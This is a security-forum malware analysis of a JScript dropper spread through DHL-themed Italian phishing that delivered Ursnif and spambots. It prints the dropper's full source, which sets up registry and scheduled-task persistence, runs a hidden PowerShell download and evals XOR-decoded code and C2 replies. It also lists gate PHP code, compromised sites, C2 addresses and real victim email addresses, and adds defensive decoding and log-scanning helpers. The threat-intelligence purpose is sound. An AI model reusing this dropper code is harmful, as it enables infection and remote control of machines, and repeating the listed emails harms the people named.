JScript dropper


Postby benkow_ » Sat Dec 17, 2016 3:53 pm

This dropper (in JScript) is related to some Ursnif, Andromeda and spambot campaigns.
It targets Italy these days.
The attack vector is an email with a URL to a zip.
http://www.malware-traffic-analysis.net ... index.html
http://malware-traffic-analysis.net/201 ... ndex2.html
ex:
Code: Select all
<img class="logo" alt="Track DHL Express Shipments" src="http://www.midnightlady2006.de/Alt/dhl.png" height="48" width="171"><br><br>
Gentile cliente giuseppe.lupano@libero.it <br><br>
Notifica, numero di consegna 1586783982<br>
<h2><center><a href="http://www.midnightlady2006.de/Alt/4857DHL.php">
documento stampa</a><center></h2><br>
Numero d'ordine: 668028042<br><br>
----------------------------------------------------------<br><br>
DHL Supply Chain (Italy) S.p.A.<br>
Sede Legale: Settala, (MI) viale delle industrie 2.<br>
Capitale sociale: Euro 1.548.000,00 diviso in n. 300.000 azioni da Euro 5,16 cad.- versato Euro 1.548.000,00<br><br> 
Soci: DHL Holding (Italy) S.r.l. (100%)<br>
Codice Fiscale/Registro Imprese: 00718630155<br>
R.E.A.: MI-618656<br>
<IMG width=1 height=1 src="http://194.58.118.144/m/a/89587.gif?Z2l1c2VwcGUubHVwYW5vQGxpYmVyby5pdA==" alt="tracking">

4857DHL.php points to https://www.virustotal.com/fr/file/6069 ... 481967305/
Example of the JScript:

Code: Select all
var shell = new ActiveXObject('WScript.Shell');
var timeout = 600000;
var gate = "http://www.elektro-morjan.de/l2.php";
var id = shell.ExpandEnvironmentStrings('%PROCESSOR_REVISION%');
 
shell.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + id + '0" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile(\'' + gate + '?cmd=d\',\'%userprofile%\\' + id + '.js\'); %userprofile%\\' + id + '.js"', 0, false);
shell.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + id + '1" /t REG_SZ /F /D "%userprofile%\\' + id + '.js"', 0, false);
shell.Run('SCHTASKS /Create /TN ' + id + ' /SC DAILY /F /TR %userprofile%\\' + id + '.js', 0, false);
var stream = new ActiveXObject('ADODB.Stream');
stream.open();
stream.type = 2;
stream.WriteText('var VymBLi  = "EGCnsr";var JXvSGMKgEgIzb = "\\x33\\x26\\x31\\x4e\\x00\\x1a\\x20\\x2b\\x2f\\x4e\\x7a\\x4f\\x65\\x29\\x26\\x19\\x53\\x33\\x26\\x33\\x2a\\x18\\x16\\x2a\\x0a\\x25\\x29\\x0b\\x10\\x06\\x6d\\x60\\x14\\x3d\\x10\\x00\\x2c\\x37\\x37\\x40\\x20\\x1a\\x20\\x2b\\x2f\\x49\\x5a\\x49\\x4f\\x31\\x22\\x1c\\x53\\x06\\x2c\\x2a\\x26\\x01\\x06\\x06\\x65\\x7a\\x63\\x58\\x43\\x42\\x75\\x77\\x73\\x55\\x79\\x04\\x24\\x35\\x63\\x09\\x12\\x06\\x20\\x67\\x4a\\x53\\x53\\x50\\x2d\\x33\\x37\\x1e\\x49\\x5d\\x6a\\x22\\x2d\\x03\\x1c\\x06\\x2a\\x69\\x20\\x01\\x1e\\x5d\\x29\\x75\\x6d\\x1e\\x1b\\x02\\x67\\x7c\\x49\\x18\\x12\\x00\\x65\\x2e\\x27\\x67\\x53\\x7b\\x78\\x67\\x30\\x06\\x16\\x1e\\x29\\x69\\x06\\x16\\x03\\x13\\x2b\\x23\\x06\\x00\\x05\\x1b\\x37\\x28\\x2d\\x03\\x16\\x1c\\x31\\x14\\x37\\x1c\\x1a\\x1c\\x22\\x34\\x6b\\x49\\x56\\x22\\x17\\x08\\x00\\x2b\\x20\\x21\\x0a\\x15\\x1c\\x3c\\x36\\x24\\x0c\\x14\\x0a\\x21\\x3d\\x57\\x62\\x6e\\x78\\x64\\x79\\x01\\x2d\\x22\\x2f\\x02\\x5d\\x20\\x30\\x29\\x6b\\x49\\x21\\x37\\x02\\x67\\x02\\x2a\\x37\\x52\\x67\\x0f\\x08\\x2d\\x26\\x2e\\x19\\x14\\x0c\\x28\\x27\\x25\\x04\\x15\\x06\\x32\\x2f\\x3f\\x2c\\x24\\x31\\x01\\x00\\x1d\\x23\\x33\\x1f\\x32\\x24\\x1b\\x2b\\x23\\x2c\\x19\\x00\\x2e\\x19\\x04\\x36\\x1c\\x01\\x17\\x2b\\x33\\x15\\x0b\\x01\\x01\\x2c\\x28\\x2d\\x32\\x2f\\x20\\x30\\x29\\x61\\x4e\\x5c\\x24\\x65\\x65\\x64\\x4e\\x58\\x52\\x2c\\x23\\x63\\x45\\x53\\x55\\x75\\x65\\x63\\x41\\x07\\x52\\x17\\x02\\x04\\x31\\x20\\x28\\x65\\x68\\x05\\x4e\\x5c\\x36\\x65\\x65\\x20\\x03\\x17\\x5c\\x20\\x3f\\x26\\x4e\\x5c\\x11\\x65\\x37\\x2c\\x19\\x16\\x00\\x36\\x2f\\x26\\x02\\x1f\\x5c\\x20\\x3f\\x26\\x4e\\x5e\\x37\\x3d\\x22\\x20\\x1b\\x07\\x1b\\x2a\\x29\\x13\\x01\\x1f\\x1b\\x26\\x3e\\x63\\x0c\\x0a\\x02\\x24\\x34\\x30\\x4e\\x5e\\x1c\\x2a\\x37\\x31\\x01\\x15\\x1b\\x29\\x22\\x63\\x43\\x04\\x1b\\x2b\\x23\\x2c\\x19\\x00\\x06\\x3c\\x2b\\x26\\x4e\\x1b\\x1b\\x21\\x23\\x26\\x00\\x53\\x5a\\x0b\\x22\\x34\\x43\\x3c\\x10\\x2f\\x22\\x20\\x1a\\x53\\x21\\x3c\\x34\\x37\\x
0b\\x1e\\x5c\\x0b\\x22\\x37\\x40\\x24\\x17\\x27\\x24\\x2f\\x07\\x16\\x1c\\x31\\x6e\\x6d\\x2a\\x1c\\x05\\x2b\\x2b\\x2c\\x0f\\x17\\x34\\x2c\\x2b\\x26\\x46\\x2f\\x55\\x62\\x67\\x68\\x4e\\x14\\x13\\x31\\x22\\x63\\x45\\x53\\x55\\x7a\\x24\\x2e\\x0a\\x4e\\x16\\x19\\x60\\x6f\\x32\\x54\\x57\\x30\\x34\\x26\\x1c\\x03\\x00\\x2a\\x21\\x2a\\x02\\x16\\x57\\x19\\x1b\\x64\\x4e\\x58\\x52\\x2c\\x23\\x63\\x45\\x53\\x55\\x6b\\x2d\\x30\\x32\\x54\\x5b\\x7e\\x67\\x66\\x1b\\x00\\x17\\x37\\x37\\x31\\x01\\x15\\x1b\\x29\\x22\\x66\\x32\\x2f\\x55\\x65\\x6c\\x63\\x07\\x17\\x52\\x6e\\x67\\x64\\x40\\x19\\x01\\x67\\x60\\x6f\\x4e\\x43\\x5e\\x65\\x21\\x22\\x02\\x00\\x17\\x6c\\x7c\\x49\\x1d\\x1b\\x17\\x29\\x2b\\x6d\\x3c\\x06\\x1c\\x6d\\x60\\x11\\x2b\\x34\\x52\\x04\\x03\\x07\\x4e\\x51\\x3a\\x0e\\x04\\x16\\x32\\x2f\\x21\\x0a\\x01\\x17\\x39\\x32\\x20\\x00\\x1b\\x1f\\x23\\x1a\\x11\\x37\\x28\\x30\\x01\\x15\\x06\\x19\\x1b\\x14\\x07\\x1d\\x16\\x2a\\x30\\x30\\x32\\x2f\\x31\\x30\\x35\\x31\\x0b\\x1d\\x06\\x13\\x22\\x31\\x1d\\x1a\\x1d\\x2b\\x1b\\x1f\\x3c\\x06\\x1c\\x67\\x67\\x6c\\x38\\x53\\x50\\x62\\x67\\x68\\x4e\\x1a\\x16\\x65\\x6c\\x63\\x49\\x42\\x50\\x65\\x68\\x37\\x4e\\x21\\x37\\x02\\x18\\x10\\x34\\x53\\x5d\\x03\\x67\\x6c\\x2a\\x53\\x50\\x60\\x32\\x30\\x0b\\x01\\x02\\x37\\x28\\x25\\x07\\x1f\\x17\\x60\\x1b\\x1f\\x49\\x53\\x59\\x65\\x2e\\x27\\x4e\\x58\\x52\\x62\\x69\\x29\\x1d\\x51\\x55\\x69\\x67\\x73\\x42\\x53\\x14\\x24\\x2b\\x30\\x0b\\x5a\\x49\\x4f\\x34\\x2b\\x0b\\x1f\\x1e\\x6b\\x15\\x36\\x00\\x5b\\x55\\x16\\x04\\x0b\\x3a\\x32\\x21\\x0e\\x14\\x63\\x41\\x30\\x00\\x20\\x26\\x37\\x0b\\x53\\x5d\\x11\\x09\\x63\\x49\\x53\\x59\\x65\\x2e\\x27\\x4e\\x58\\x52\\x62\\x67\\x6c\\x3d\\x30\\x52\\x01\\x06\\x0a\\x22\\x2a\\x52\\x6a\\x01\\x63\\x41\\x27\\x20\\x65\\x62\\x36\\x1d\\x16\\x00\\x35\\x35\\x2c\\x08\\x1a\\x1e\\x20\\x62\\x1f\\x32\\x54\\x52\\x6e\\x67\\x2a\\x0a\\x53\\x59\\x65\\x60\\x6d\\x04\\x00\\x55\\x69\\x67\\x73\\x42\\x53\\x14\\x24\\x2b\\x30\\x0b\\x5a\\x49\\x4f\\x4d\\x34\\x06\\x1a\\x1e\\x20\\x6f\\x37\\x1c\\x06\\x17\\x6c\\x
67\\x38\\x64\\x7a\\x06\\x37\\x3e\\x63\\x15\\x79\\x7b\\x4c\\x31\\x22\\x1c\\x53\\x0a\\x28\\x2b\\x2b\\x1a\\x07\\x02\\x65\\x7a\\x63\\x00\\x16\\x05\\x65\\x06\\x20\\x1a\\x1a\\x04\\x20\\x1f\\x0c\\x0c\\x19\\x17\\x26\\x33\\x6b\\x49\\x3e\\x21\\x1d\\x0a\\x0f\\x5c\\x5d\\x2a\\x08\\x0b\\x0b\\x3a\\x27\\x22\\x62\\x6e\\x78\\x64\\x7a\\x7b\\x3d\\x2a\\x2f\\x06\\x07\\x06\\x35\\x69\\x2c\\x00\\x01\\x17\\x24\\x23\\x3a\\x1d\\x07\\x13\\x31\\x22\\x20\\x06\\x12\\x1c\\x22\\x22\\x63\\x53\\x53\\x14\\x30\\x29\\x20\\x1a\\x1a\\x1d\\x2b\\x6f\\x6a\\x4e\\x08\\x78\\x4c\\x4e\\x4a\\x07\\x15\\x52\\x6d\\x3f\\x2e\\x02\\x1b\\x06\\x31\\x37\\x6d\\x1c\\x16\\x13\\x21\\x3e\\x10\\x1a\\x12\\x06\\x20\\x67\\x7e\\x53\\x53\\x46\\x65\\x61\\x65\\x4e\\x0b\\x1f\\x29\\x2f\\x37\\x1a\\x03\\x5c\\x36\\x33\\x22\\x1a\\x06\\x01\\x65\\x7a\\x7e\\x4e\\x41\\x42\\x75\\x6e\\x63\\x15\\x79\\x7b\\x4c\\x4e\\x4a\\x07\\x15\\x52\\x6d\\x3f\\x2e\\x02\\x1b\\x06\\x31\\x37\\x6d\\x1c\\x16\\x01\\x35\\x28\\x2d\\x1d\\x16\\x26\\x20\\x3f\\x37\\x40\\x1f\\x17\\x2b\\x20\\x37\\x06\\x53\\x53\\x78\\x67\\x73\\x47\\x53\\x09\\x4f\\x4e\\x4a\\x67\\x7a\\x7b\\x20\\x31\\x22\\x02\\x5b\\x0a\\x28\\x2b\\x2b\\x1a\\x07\\x02\\x6b\\x35\\x26\\x1d\\x03\\x1d\\x2b\\x34\\x26\\x3a\\x16\\x0a\\x31\\x6e\\x78\\x64\\x7a\\x7b\\x4c\\x4e\\x3e\\x55\\x79\\x7b\\x4c\\x4e\\x3e\\x55\\x79\\x7b\\x4c\\x3a\\x78\\x64\\x7a\\x7b\\x3d\\x2a\\x2f\\x06\\x07\\x06\\x35\\x69\\x2c\\x1e\\x16\\x1c\\x6d\\x60\\x04\\x2b\\x27\\x55\\x69\\x67\\x24\\x0f\\x07\\x17\\x65\\x6c\\x63\\x49\\x4c\\x11\\x28\\x23\\x7e\\x1e\\x55\\x1b\\x21\\x7a\\x64\\x4e\\x58\\x52\\x2c\\x23\\x63\\x45\\x53\\x55\\x63\\x35\\x2d\\x0a\\x4e\\x55\\x65\\x6c\\x63\\x23\\x12\\x06\\x2d\\x69\\x31\\x0f\\x1d\\x16\\x2a\\x2a\\x6b\\x47\\x5f\\x52\\x23\\x26\\x2f\\x1d\\x16\\x5b\\x7e\\x4d\\x4a\\x67\\x0b\\x1f\\x29\\x2f\\x37\\x1a\\x03\\x5c\\x36\\x22\\x2d\\x0a\\x5b\\x5b\\x7e\\x4d\\x4a\\x67\\x17\\x17\\x29\\x22\\x37\\x0b\\x53\\x0a\\x28\\x2b\\x2b\\x1a\\x07\\x02\\x7e\\x4d\\x4a\\x67\\x24\\x21\\x26\\x35\\x2a\\x1e\\x07\\x5c\\x16\\x2b\\x26\\x0b\\x03\\x5a\\x31\\x2e\\x2e\\x0b\\x1c\\x
07\\x31\\x6e\\x78\\x64\\x7a\\x0f\\x65\\x24\\x22\\x1a\\x10\\x1a\\x65\\x6f\\x26\\x47\\x53\\x09\\x4f\\x4d\\x4a\\x13\\x48\\x78\\x38\\x7c";for (var SiczyrKHcPCB = "", XCUvVL = 0, hFnVmXPHiJrSz = 0; XCUvVL < JXvSGMKgEgIzb.length; XCUvVL++) {SiczyrKHcPCB += String.fromCharCode(JXvSGMKgEgIzb.charCodeAt(XCUvVL) ^ VymBLi.charCodeAt(hFnVmXPHiJrSz));hFnVmXPHiJrSz++;if (hFnVmXPHiJrSz == VymBLi.length) {hFnVmXPHiJrSz = 0;};};this["eval"](SiczyrKHcPCB);', 0);
stream.position = 0;
stream.saveToFile(shell.ExpandEnvironmentStrings('%userprofile%') + '\\' + id + '.js', 2);
while (true) {
    try {
        var xmlhttp = new ActiveXObject('MSXML2.XMLHTTP');
        xmlhttp.onreadystatechange = function() {
            if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
                if (xmlhttp.responseText.length != 0) {
                    eval(xmlhttp.responseText);
                };
            };
        };
        xmlhttp.open('GET', gate + '?cmd=p&id=' + id + '&rnd=' + Math.random(), false);
        xmlhttp.send();
        delete xmlhttp;
        WScript.Sleep(timeout);
    } catch (e) {
 
    };
};


Code: Select all
var gate = "http://www.elektro-morjan.de/l2.php";
changes at every refresh.
Full list of "gates" (compromised websites, probably via FTP brute force):

Code: Select all
http://151.236.13.49/l2.php
http://151.236.13.49/l3.php
http://170567.webhosting65.1blu.de/l2.php
http://191860.webhosting63.1blu.de/l2.php
http://191860.webhosting63.1blu.de/l3.php
http://454391.webx04.mmc.at/l2.php
http://454391.webx04.mmc.at/l3.php
http://46.163.110.45/css/l2.php
http://46.163.110.45/css/l3.php
http://ballettschule-nottuln.de/l2.php
http://di000240.host.inode.at/l3.php
http://ebkk.nl/l2.php
http://edle-steine.at/l2.php
http://edle-steine.at/l3.php
http://enmoto.com/l2.php
http://enmoto.com/l3.php
http://evastrutzmann.at/l2.php
http://evi-verein.at/l2.php
http://evi-verein.at/l3.php
http://fioravanti-production.org/l2.php
http://friesl-keramik.at/l2.php
http://friesl-keramik.at/l3.php
http://ftp.dimensionevideo.it/l2.php
http://ftp.dimensionevideo.it/l3.php
http://ftp.italiabrowsergame.com/l2.php
http://ftp.italiabrowsergame.com/l3.php
http://ftp.msinformatica.it/l3.php
http://getting-reconnected.de/l2.php
http://getting-reconnected.de/l3.php
http://gunnebo.eniac.it/l2.php
http://gunnebo.eniac.it/l3.php
http://hobbygartenteich.at/l2.php
http://hostelinramallah.com/l2.php
http://hostelinramallah.com/l3.php
http://hotelsantantonio.com/l2.php
http://hotelsantantonio.com/l3.php
http://humanitas-gbr.de/l2.php
http://jambasket.com.hk/l2.php
http://jambasket.com.hk/l3.php
http://juwelier-hohenberger.de/l2.php
http://katstones.de/l2.php
http://lklv.wz.cz/l2.php
http://lklv.wz.cz/l3.php
http://mauriz.at/l2.php
http://mauriz.at/l3.php
http://meindl-edv.eu/l2.php
http://meindl-edv.eu/l3.php
http://nr11303.vhost-enzo.sil.at/l2.php
http://nr11303.vhost-enzo.sil.at/l3.php
http://pajaje.borec.cz/l2.php
http://pajaje.borec.cz/l3.php
http://patrickhess.de/l2.php
http://pferdemedizin-stanek.at/l2.php
http://portoverde.it/l2.php
http://portoverde.it/l3.php
http://positivemindstates.com/l2.php
http://psymaster.wz.cz/l2.php
http://psymaster.wz.cz/l3.php
http://reimer-wulf.de/l2.php
http://reimer-wulf.de/l3.php
http://sca.homelinux.com/l2.php
http://spatialpourtous.com/l2.php
http://spatialpourtous.com/l3.php
http://supercondmat.org/l2.php
http://supercondmat.org/l3.php
http://tennis-arnfels.at/l2.php
http://tennis-arnfels.at/l3.php
http://tischlerei-kreiner.at/l2.php
http://tischlerei-kreiner.at/l3.php
http://umzuegeberlin.com/l2.php
http://www.diamondfitness.hu/l2.php
http://www.drogenhilfezentrum.de/l2.php
http://www.dtk-brandenburg.de/l2.php
http://www.elektro-morjan.de/l2.php
http://www.elektro-morjan.de/l3.php
http://www.kurzhaarteckel-trakehner.de/l2.php
http://www.midnightlady2006.de/l2.php
http://www.msinformatica.it/l2.php
http://www.seelackenmuseum-sbg.at/l2.php
http://www.skyways-ragdolls-zwergspitze.de/l2.php
http://www.teeversand24.net/l2.php
http://www.valentinavalsania.it/mdb-databases/cgi-bin/l2.php
http://www.valentinavalsania.it/mdb-databases/cgi-bin/l3.php
http://www.webstream.at/l2.php


l2.php:
Code: Select all
<?php
    $ip = $_SERVER["REMOTE_ADDR"];
    echo @file_get_contents("http://109.120.142.156/loader2/gate.php?ip=$ip&".$_SERVER['QUERY_STRING']);
?>


GET request:
l2.php?cmd=p&id=4e03&rnd=1337 -> returns other payloads. Full list: https://pastebin.com/xBfgjhXy

It drops various stuff:
178.33.182.145/dll/100.bin
91.134.123.103/dload/100.bin
194.58.100.59/core/fix832922.ms
51892372.de.strato-hosting.eu/cgi-data/1.exe
https://www.virustotal.com/file/d5f72f1 ... 478963438/
https://www.virustotal.com/file/b5c87ca ... 481555696/
https://www.virustotal.com/file/fd11e03 ... 480163765/
https://www.virustotal.com/file/6d764a9 ... 481979160/

Some stats are openly available on the CnC server:
http://109.120.142.156/loader2/stat.php (17,972 bots)
http://109.120.142.156/loader3/stat.php

Spambot used for spreading JSDropper: https://www.virustotal.com/fr/file/b5c8 ... 481555696/
gate XXXX/webserver.php:
Code: Select all
$server = 'aHR0cDovLzE5NC4yNDcuMTMuOC9pbWcv';
if (($_POST=='')and($_GET=='')) { exit; }
echo file_get_contents(base64_decode($server).'?'.http_build_query($_GET), false, stream_context_create(array('http' => array('method' => 'POST','header' => 'Content-type: application/x-www-form-urlencoded','content' => http_build_query($_POST).'&ip='.$_SERVER))));

CNC: http://194.247.13.8/img/admin.php / http://194.247.13.8/js/admin.php

One week ago the spambot was used for target identification with this kind of email:
Code: Select all
ti amo.chiamami. +398258863192
<IMG width=1 height=1 src="http://194.58.118.144/m/a/79757.gif?YmF0bWFubm84N0Bob3RtYWlsLml0" alt="mobile">


Results of the identification wave are openly available.
Android:
Code: Select all
iXXX@XXXXX.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0.1; SM-T805 Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Safari/537.36
info@betatechnologies.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0.1; XT1562 Build/MPD24.107-52; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36
info@ambientesrl.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36
info@ambientesrl.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36
info@ambientesrl.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0.1; SM-G935F Build/MMB29K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36
info@ufhalignami.it,x.x.x.x,Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy NexusBuild/ICL53F) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
info@fratresotranto.it,x.x.x.x,Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/54.0.2840.85 Mobile Safari/537.36
[...]


iPhone:
Code: Select all
deborah_1986@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Mobile/14B100
ale.cupido@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Mobile/14B100
martina.mulas@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Mobile/14B100
vale_4694@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Mobile/14B100
rzoby@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Mobile/11D257
andrea.mantegazza@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Mobile/14A456
andrea.mantegazza@live.it,x.x.x.x,Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Mobile/14A456
andreaalfarano@live.it,x.x.x.x,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko)
edoardomazzella93@live.it,x.x.x.x,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko)
[...]


Office:
Code: Select all
mandinga@hotmail.it,x.x.x.x,Microsoft Office/16.0 (Microsoft Outlook Mail 16.0.7466; Pro)
cmax24@hotmail.it,x.x.x.x,Microsoft Office/16.0 (Microsoft Outlook Mail 16.0.7705; Pro)
fedi89@hotmail.it,x.x.x.x,Microsoft Office/16.0 (Microsoft Outlook Mail 16.0.7466; Pro)
luca.conte93@hotmail.it,x.x.x.x,Microsoft Office/16.0 (Microsoft Outlook Mail 16.0.7466; Pro)
[...]

etc.
Today it's used to spread a banking trojan: https://www.virustotal.com/file/6d764a9 ... 481979160/

TL;DR:
JScript dropper CNC:
109.120.142.156/loader2/stat.php
109.120.142.156/loader3/stat.php
Spambot related CNC:
194.247.13.8/img/admin.php
194.247.13.8/js/admin.php
benkow_
 
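As an added example that is not part of the post above (and not the dropper author's code), here are two static-analysis helpers in JavaScript for the dropper benkow_ describes. decodeStage() re-implements the repeating-key XOR loop the dropper writes into %userprofile%\<id>.js, so the second stage can be recovered as text instead of being handed to eval(); findBeacons() looks in web-proxy log lines for the gate polling pattern from the while(true) loop (<gate>/l2.php or /l3.php with cmd=d to fetch the body and cmd=p&id=<PROCESSOR_REVISION>&rnd=<Math.random()> to poll). The proxy log format, the sample log lines and the plaintext used to exercise the decoder are constructed for this example; the key "EGCnsr", the gate host and the id 4e03 are taken from the post.

```javascript
// Added example: static analysis helpers for the JScript dropper shown above.
// Not code from the forum post. decodeStage() re-implements the dropper's own
// repeating-key XOR loop so the WriteText() payload can be read without eval();
// findBeacons() flags the polling pattern from the while(true) loop,
// <gate>/l2.php?cmd=p&id=<PROCESSOR_REVISION>&rnd=<Math.random()>, in proxy logs.
// Every sample input below is constructed for this example.
"use strict";

// Expand "\xNN" escape text into the characters it denotes. The page's sample
// carries the escapes as "\\x33" inside a WriteText('...') literal, so both the
// single- and double-backslash spellings are accepted.
function unescapeHex(text) {
  return text.replace(/\\\\?x([0-9a-fA-F]{2})/g,
    (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Repeating-key XOR exactly as the dropper's loop does it:
// out[i] = data[i] ^ key[i % key.length]. XOR is its own inverse, so the same
// routine both obfuscates and recovers the stage.
function xorWithKey(data, key) {
  let out = "";
  for (let i = 0; i < data.length; i++) {
    out += String.fromCharCode(data.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return out;
}

// Locate 'var <k> = "<key>";var <d> = "<\xNN...>";' in dropper source and return
// the decoded second stage as text, or null if the pattern is absent. The
// variable names change per sample, so they are matched generically.
function decodeStage(source) {
  const re = /var\s+\w+\s*=\s*"([^"\\]+)";\s*var\s+\w+\s*=\s*"((?:\\\\?x[0-9a-fA-F]{2})+)";/;
  const m = re.exec(source);
  return m ? xorWithKey(unescapeHex(m[2]), m[1]) : null;
}

// Wrap a known plaintext in a dropper-style stub so decodeStage() can be
// exercised offline. Constructed: the key "EGCnsr" is the one in the page's
// sample, the plaintext is not the real payload.
function buildStub(key, plaintext) {
  const escaped = Array.from(xorWithKey(plaintext, key),
    (c) => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
  return 'var VymBLi  = "' + key + '";var JXvSGMKgEgIzb = "' + escaped + '";' +
    'this["eval"](SiczyrKHcPCB);';
}

// Beacon URL shape taken from the dropper: the gate path ends in /l2.php or
// /l3.php; cmd=d downloads the dropper body, cmd=p polls for a payload and
// carries id=<4 hex digits from %PROCESSOR_REVISION%> plus a random cache-buster.
const BEACON_RE = /\/l[23]\.php\?cmd=(d|p)(?:&id=([0-9a-fA-F]{4})&rnd=[0-9.]+)?$/;

// Scan proxy log lines and return one record per beacon. The log format
// "<timestamp> <client-ip> GET <url> <status>" is an assumption of this example.
function findBeacons(logLines) {
  const hits = [];
  for (const line of logLines) {
    const f = line.trim().split(/\s+/);
    if (f.length < 5 || f[2] !== "GET") continue;
    const m = BEACON_RE.exec(f[3]);
    if (!m) continue;
    hits.push({ client: f[1], gate: f[3].split("?")[0], cmd: m[1], id: m[2] || null });
  }
  return hits;
}

// Constructed log lines: a bot fetching the dropper (cmd=d) and then polling the
// gate every ten minutes, plus two benign lines that must not match.
const SAMPLE_LOG = [
  "2016-12-17T14:10:02Z 10.0.0.21 GET http://www.elektro-morjan.de/l2.php?cmd=d 200",
  "2016-12-17T14:10:03Z 10.0.0.21 GET http://www.elektro-morjan.de/l2.php?cmd=p&id=4e03&rnd=0.7356 200",
  "2016-12-17T14:20:03Z 10.0.0.21 GET http://www.elektro-morjan.de/l2.php?cmd=p&id=4e03&rnd=0.1104 200",
  "2016-12-17T14:20:05Z 10.0.0.34 GET http://www.example.com/l2.php 200",
  "2016-12-17T14:20:07Z 10.0.0.34 GET http://www.example.com/index.php?cmd=p&id=4e03&rnd=0.5 200",
];

// Stand-alone demonstration.
console.log(decodeStage(buildStub("EGCnsr", "var x = 1; WScript.Echo(x);")));
console.log(findBeacons(SAMPLE_LOG));
```

Run it with node. For a real sample, pass the outer dropper source (the file that calls ADODB.Stream) straight to decodeStage(); the regex accepts the doubled backslashes that the WriteText() literal carries. The recovered stage is returned as text only and should still be treated as hostile, never executed. The beacon match is deliberately tight (id of exactly four hex digits, rnd numeric, nothing after it), because the polling loop on this page always emits that exact shape; loosen it if you see variants.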

Re: JScript dropper

Postby Antelox » Sun Dec 18, 2016 8:28 am

Antelox
 

Re: JScript dropper

Postby benkow_ » Sun Feb 26, 2017 4:33 pm

List of "Onliner" spambots still up (used for spreading Ursnif)
Code: Select all
http://194.247.13.8/img/login.php
http://194.247.13.178/naomi/login.php
http://194.247.13.196/asus/login.php
benkow_
 

